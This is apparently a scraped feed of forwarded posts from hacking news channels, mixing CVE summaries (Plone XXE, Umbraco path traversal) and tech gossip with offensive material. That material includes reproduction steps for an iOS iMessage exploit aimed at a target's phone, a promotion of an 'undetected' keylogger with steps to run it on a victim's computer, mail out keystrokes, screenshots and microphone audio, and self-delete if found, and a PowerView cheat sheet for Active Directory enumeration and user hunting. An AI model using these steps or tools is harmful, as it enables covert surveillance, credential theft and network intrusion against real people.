Forwarded from UNDERCODE NEWS
Forwarded from DailyCVE
Dailycve
Plone XXE attacks | CVE
Details:
Plone is a Zope Technology Server-based open source content management system (CMS). In Plone versions prior to 5.2.3, there is a security vulnerability which allows XXE attacks to be carried out without permission through features protected by…
Free recommended project Haka:
An open source security oriented language which allows to describe protocols and apply security policies on (live) captured traffic. The scope of Haka language is twofold. First of all, it allows to write security rules in order to filter/alter/drop unwanted packets and log and report malicious activities. Second, Haka features a grammar enabling to specify network protocols and their underlying state machine.
» http://www.haka-security.org
Forwarded from UNDERCODE NEWS
The truth of the 'phantom market merger' of NEC / Fujitsu, the Hinomaru Union set up by NTTT.
#International
Hack/ Pentesting iOS browsers with bug: guide
https://bugs.chromium.org/p/project-zero/issues/detail?id=1858
1) The class _NSDataFileBackedFuture can be deserialized even if secure encoding is enabled.
2) This class is a file-backed NSData object that loads a local file into memory when the [NSData bytes] selector is called.
3) This presents two problems. First, it could potentially allow undesired access to local files if the code deserializing the buffer ever shares it (this is more likely to cause problems in components that use serialized objects to communicate locally than in iMessage).
4) Second, it allows an NSData object to be created with a length that is different than the length of its byte array. This violates a very basic property that should always be true of NSData objects. This can allow out of bounds reads, and could also potentially lead to out-of-bounds writes, as it is now possible to create NSData objects with very large sizes that would not be possible if the buffer was backed.
To reproduce the issue with the files in filebacked.zip:
1) install frida (pip3 install frida)
2) open sendMessage.py, and replace the sample receiver with the phone number or email of the target device
3) in injectMessage.js replace the marker "PATH" with the path of the obj file
4) in the local directory, run:
python3 sendMessage.py
Please note that the attached repro case is a simple example to demonstrate the reachability of the class in Springboard. The actual consequences of the bug are likely more serious. This PoC only works on devices with iOS 12 or later.
code/ref :
https://github.com/TinToSer/ios-RCE-Vulnerability
Forwarded from DailyCVE
Dailycve
Umbraco path traversal vulnerability | CVE
Details:
Umbraco is a Content Management System (CMS) open source written by Umbraco, Denmark, in C#. There is a path traversal flaw in Umbraco CMS 8.9.1 and earlier versions, allowing arbitrary files to be written outside the home directory of the site and…
Forwarded from UNDERCODE NEWS
Undetected. Get Keyboard,Mouse,ScreenShot,Microphone Inputs from Target Computer and Send to your Mail.
#Hacking
INSTALLATION & RUN :
• DOWNLOAD : https://github.com/aydinnyunus/Keylogger
• Set your own MAIL and PASSWORD on "keylogger.py".
• Run keylogger.py on Target Computer
• Every 10 seconds,You Get the Data from the Target Computer
• If Target finds the Code and Open the File for Want to Learn your MAIL and Password The Program DELETE itself.
Forwarded from DailyCVE
Dailycve
AIRDROPX BORN security vulnerability | CVE
Details:
AIRDROPX BORN is an AIRDROPX BORN API token service which can be used for Bitcoin and other network currencies to be transferred and exchanged. Version 2019-05-29 of AIRDROPX BORN and older versions have a security flaw.
The flaw derives from a constructor's…
Forwarded from UNDERCODE NEWS
A cheat sheet that contains common enumeration and attack methods for Windows Active Directory:
Enum Domain Computers:
Get-NetComputer -FullData
Get-DomainGroup
#Enumerate Live machines
Get-NetComputer -Ping
Enum Groups and Group Members:
Get-NetGroupMember -GroupName "<GroupName>" -Domain <DomainName>
#Enumerate the members of a specified group of the domain
Get-DomainGroup -Identity <GroupName> | Select-Object -ExpandProperty Member
#Returns all GPOs in a domain that modify local group memberships through Restricted Groups or Group Policy Preferences
Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName
Enumerate Shares
#Enumerate Domain Shares
Find-DomainShare
#Enumerate Domain Shares the current user has access
Find-DomainShare -CheckShareAccess
Enum Group Policies:
Get-NetGPO
# Shows active Policy on specified machine
Get-NetGPO -ComputerName <Name of the PC>
Get-NetGPOGroup
#Get users that are part of a Machine's local Admin group
Find-GPOComputerAdmin -ComputerName <ComputerName>
Enum OUs:
Get-NetOU -FullData
Get-NetGPO -GPOname <The GUID of the GPO>
Enum ACLs:
# Returns the ACLs associated with the specified account
Get-ObjectAcl -SamAccountName <AccountName> -ResolveGUIDs
Get-ObjectAcl -ADSprefix 'CN=Administrator, CN=Users' -Verbose
#Search for interesting ACEs
Invoke-ACLScanner -ResolveGUIDs
#Check the ACLs associated with a specified path (e.g smb share)
Get-PathAcl -Path "\\Path\Of\A\Share"
Enum Domain Trust:
Get-NetDomainTrust
Get-NetDomainTrust -Domain <DomainName>
Enum Forest Trust:
Get-NetForestDomain
Get-NetForestDomain -Forest <ForestName>
#Domains of Forest Enumeration
Get-NetForestDomain
Get-NetForestDomain -Forest <ForestName>
#Map the Trust of the Forest
Get-NetForestTrust
Get-NetDomainTrust -Forest <ForestName>
User Hunting:
#Finds all machines on the current domain where the current user has local admin access
Find-LocalAdminAccess -Verbose
#Find local admins on all machines of the domain:
Invoke-EnumerateLocalAdmin -Verbose
#Find computers where a Domain Admin OR a specified user has a session
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"
Invoke-UserHunter -Stealth
#Confirming admin access:
Invoke-UserHunter -CheckAccess
AVAILABLE HERE » : https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
Forwarded from UNDERCODE NEWS
Is the iPhone folding screen coming? Two prototypes are subject to preliminary testing.
#Technologies